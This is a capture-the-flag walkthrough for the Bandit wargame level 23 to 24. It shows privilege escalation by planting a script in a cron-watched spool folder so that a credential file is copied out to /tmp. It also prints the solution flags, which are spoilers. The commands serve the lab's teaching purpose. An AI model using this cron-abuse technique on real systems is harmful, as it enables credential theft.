Bandit Level 23 → Level 24

Introduction

Welcome back, in this level we will learn some basics of privilege escalation by abusing cron jobs.

Previous flag

QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G

Checking Cron files

Let´s start checking cron jobs for the user bandit24.

cat /etc/cron.d/cronjob_bandit24

The entries within this file reveal the location of a script in the /usr/bin folder.

Reading Cron Script

Let’s open the .sh script file and check its contents:

cat /usr/bin/cronjob_bandit24.sh

The contents of this file show us that the cron job iterates over the files in the /var/spool/bandit24/foo folder and executes files owned by us, bandit23

#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

Let’s write a bash command that copies the password from bandit24 to a temporary location

cat /etc/bandit_pass/bandit24 > /tmp/bandit23/password.txt

Abusing the Cron Job

Create a directory and script to intercept the password:

mkdir /tmp/bandit23
nano /var/spool/bandit24/foo/script.sh

Within the newly created script, inscribe the command we defined before:

#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/bandit23/password.txt

Grant execution permissions to the script:

chmod +x /var/spool/bandit24/foo/script.sh

Now, the exploit is set. After the cron job is executed, we can read the password for the next level:

cat /tmp/bandit23/password.txt

Flag:

VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar